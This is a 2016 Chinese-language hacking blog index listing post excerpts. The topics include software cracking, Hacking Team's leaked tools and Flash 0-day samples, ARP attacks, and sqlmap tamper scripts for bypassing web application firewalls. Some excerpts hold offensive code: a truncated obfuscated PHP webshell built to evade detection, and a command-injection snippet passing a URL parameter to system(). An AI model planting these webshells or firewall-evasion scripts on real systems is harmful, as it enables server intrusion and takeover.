• 【分享】渗透测试常用“神器”
  • Python WEB框架下集成乌云漏洞查询
  • 搭建属于你自己的维基站点:MediaWiki

    2016-12-24 10:06 阅读:114

    搭建属于你自己的维基站点:MediaWiki

    MediaWiki 是一个全球著名的开源的,运行于 PHP+MySQL 环境下的 wiki 程序 。例如,全球最大的 wiki 项目 维基百科,就是使用 MediaWiki 运营的成功范例。更多关于 MediaWiki 的介绍,我们可以 在这里找到 。 服务器配置 搭建 LAMP 环境后,我们还需要安装一

    阅读全文
  • 教你改软件版权,成为版权狗

    2016-12-18 14:33 阅读:156

    教你改软件版权,成为版权狗

    前言: 我为什么要发这篇帖子呢?那是因为我很不爽,前几天公开了 傀儡注入点批量扫描工具V5.0+ 的 源码,之后又冒出各种版本的扫描工具。有些人比着我的源码抄,写出自己的版本之后回头说我的软件辣鸡,误报高。我说,你比着我的软件源码抄的,还说我的软

    阅读全文
  • Hacking team被黑各种工具+flash 0day样本

    2016-12-13 15:38 阅读:125

    Hacking team被黑各种工具+flash 0day样本

    如果你不是在买硬盘就一定是在买硬盘的路上 hacking team被黑各种工具大家都是大下特下啊! 不过当前提供下载的地方好像不是很多!这里我也附加一下给大家把 我的小伙伴们都惊呆了! 这是链接: https://ht.transparencytoolkit.org 大家都懂的!!!要的速

    阅读全文
  • 【图文教学系列】“破解大牛是怎么炼成的”之壳与ESP定律

    2016-11-28 14:46 阅读:154

    【图文教学系列】“破解大牛是怎么炼成的”之壳与ESP定律

    一、 前言 通过前面几篇的学习,我们学会了利用暴力破解达到绕过注册机制和追踪注册码来达到合法用软件的方法,但是我们往往会遇到代码经过混淆器混淆的程序,此类混淆器可以称之为壳,壳又可分为压缩壳(常见的有 UPX、北斗、ASDPack、Npack、 PECompact 等

    阅读全文
  • php过狗一句话

    2016-11-27 15:55 阅读:151

    php过狗一句话

    分享一个别的地方看到的 混淆过狗php一句话 ?php $mt=mFsKCleRfU; $ojj=IEBleldle; $hsa=E9TVFsnd2VuJ10p; $fnx=Ow==; $zk = str_replace(d,,sdtdrd_redpdldadcde); //字符串替换:替换sdtdrd_redpdldadcde里的d为空 返回str_replace $ef = $zk(z, , zbazsze

    阅读全文
  • ARP全攻略分享

    2016-11-26 14:12 阅读:164

    ARP全攻略分享

    前言 我们知道,当我们在浏览器里面输入网址时,DNS服务器会自动把它解析为IP地址,浏览器实际上查找的是IP地址而不是网址。那么IP地址是如何转换为第二层物理地址(即MAC地址)的呢?在局域网中,这是通过ARP协议来完成的。ARP协议对网络安全具有重要的意义

    阅读全文
  • Python WEB框架下集成乌云漏洞查询

    2016-11-26 13:59 阅读:167

    Python WEB框架下集成乌云漏洞查询

    做渗透的时候遇到一个系统可以到网上搜索下这个系统的相关漏洞,众所周知的原因,wooyun关闭了很久,所以我们最好自己搭建一个乌云镜像。

    阅读全文
  • 最优秀的Kali Linux渗透测试课程

    2016-11-26 10:06 阅读:108

    最优秀的Kali Linux渗透测试课程

    0x00 前言 称为最优秀我个人觉得一点都不为过,目前市面上的那些课程先不说能不能把工具实现的原理讲清楚,就连工具的功能也是一知半解,更不说系统完整的渗透测试框架,yuanfh老师可能是我见过讲Kali Linux渗透测试最优秀的老师,很有幸学到老师的课程,老

    阅读全文
  • Base64 编码介绍、Base64编码转换原理、算法

    2016-11-26 09:58 阅读:133

    Base64 编码介绍、Base64编码转换原理、算法

    Base64编码,是我们程序开发中经常使用到的编码方法。它是一种基于用64个可打印字符来表示二进制数据的表示方法。它通常用作存储、传输一些二进制数据编码方法!也是MIME(多用途互联网邮件扩展,主要用作电子邮件标准)中一种可打印字符表示二进制数据的常

    阅读全文
  • Sqlmap过狗过云锁注入脚本一枚

    2016-11-25 10:28 阅读:128

    Sqlmap过狗过云锁注入脚本一枚

    #!/usr/bin/env python[/color][/size] [size=3][color=lime] Copyright (c) 2006-2016 sqlmap developers ([/color][/size][url=http://sqlmap.org/][size=3][color=lime]http://sqlmap.org/[/color][/size][/url][size=3][color=lime]) See the file doc/C

    阅读全文
  • Sqlmap过360注入脚本一枚

    2016-11-25 10:24 阅读:148

    Sqlmap过360注入脚本一枚

    #!/usr/bin/env python[/color][/size][/b] [b][size=3][color=#ff0000] Copyright (c) 2006-2016 sqlmap developers ([url=http://sqlmap.org/]http://sqlmap.org/[/url]) See the file doc/COPYING for copying permission [/color][/size][/b] [b][size=3

    阅读全文
  • 利用php进行命令注入攻击演练

    2016-11-25 09:26 阅读:90

    利用php进行命令注入攻击演练

    本机搭建php环境我用的是phpstudy 软件下载地址: http://www.baidu.com 自己配置phpstudy 我就不废话了 网站根目录新建index.php名字随便啊index 我只是图一个方便而已~~! ?$cmd = $_GET[cmd];echo pre;system($cmd);echo /pre;? 代码写入然后本机访问网站

    阅读全文